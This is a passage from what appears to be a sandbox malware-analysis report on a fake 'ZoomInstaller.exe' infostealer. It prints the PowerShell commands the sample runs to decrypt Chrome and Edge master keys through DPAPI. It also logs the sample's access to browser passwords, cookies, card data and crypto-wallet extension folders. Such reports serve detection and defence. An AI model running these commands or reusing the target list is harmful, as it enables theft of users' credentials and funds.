48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser); $decryptedKeyString = [System.BitConverter]::ToString($decryptedKey) -replace '-', ''; Write-Output $decryptedKeyString"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " add-type -assemblyname \"system.security\"; $decryptedkey = [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, [system.security.cryptography.dataprotectionscope]::currentuser); $decryptedkeystring = [system.bitconverter]::tostring($decryptedkey) -replace '-', ''; write-output $decryptedkeystring"Jump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\FENIVHOIKN VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\UMMBDNEQBN VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Documents\WUTJSCBCFX VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\FENIVHOIKN VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\VLZDGUKUTZ VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\Downloads VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Autofills VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\History VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Passwords VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Wallets VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cards VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeQueries volume information: C:\Users\user\AppData\Local\Ailurophile\Cookies VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Detected generic credential text file
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\Ailurophile\Cards\Cards.txtJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\Ailurophile\Autofills\Autofills.txtJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile created: C:\Users\user\AppData\Local\Ailurophile\Cookies\Google_Default.txtJump to behavior
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ocglkepbibnalbgmbachknglpdipeoioJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfndJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Neon\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbhJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcbigmjiafegjnnogedioegffbooigliJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibgJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjcaJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiiooljJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Network\CookiesJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\history.dbJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieafJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkibJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpdJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfclJump to behavior
    Source: C:\Users\user\Desktop\ZoomInstaller.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnkJump to behavior
